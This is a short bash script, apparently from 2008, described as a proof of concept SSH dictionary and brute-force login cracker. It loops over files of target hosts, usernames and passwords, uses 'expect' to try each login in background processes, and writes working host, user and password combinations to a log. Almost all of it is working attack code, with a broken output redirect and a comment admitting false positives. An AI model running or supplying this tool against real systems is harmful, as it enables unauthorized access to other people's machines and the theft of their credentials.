#!/bin/bash
## Koen Noens, 15 March 2008
##
## proof of concept of a dictionary / brute-force password / login (ssh) cracker
## exercise in recursive functions and the use of 'expect'
#
#################################################################################"

SSHPORT="22"     	#allows to use non-standard ports eg after portscan
LOG="ssh_success"

function ssh_connect () {
	# expect sequence thanks to http://bash.cyberciti.biz/security/sshlogin.exp.php
	expect <<eof
	spawn ssh -o NumberOfPasswordPrompts=1 $2@$1
	expect "*assword:*" 
	send -- "$3\r"
	send -- "\r"
	expect {
		"*$1*" {send "exit"; exit 0}
		"*$2*" {send "exit"; exit 0}
		"*denied*" {exit 1}
	}
eof
[[ "$?" = "0" ]] && echo "$1 $2 $3 " >> $LOG
}

#move old log out of the way
[[ -e $LOG ]] && mv $LOG $LOG.$(date +%Y%m%d%s)

#iteration to attempt ssh logons
## background process seems to produce false positives sometimes
for TARGET in $(cat targets); do
	for NAME in $(cat names); do
		for PASS in $(cat pass); do
			# in background so we can continue with next attempt 
			# while we wait for a reply from this one. FIXME : backgrounding produces false positives
	               	( ssh_connect $TARGET $NAME $PASS )&  2&1>/dev/nul
		done;
	done;
done;
echo -n "trying to log on to multiple targets ... "
wait
echo "done."
echo "succesfull logons are recorded in $LOG"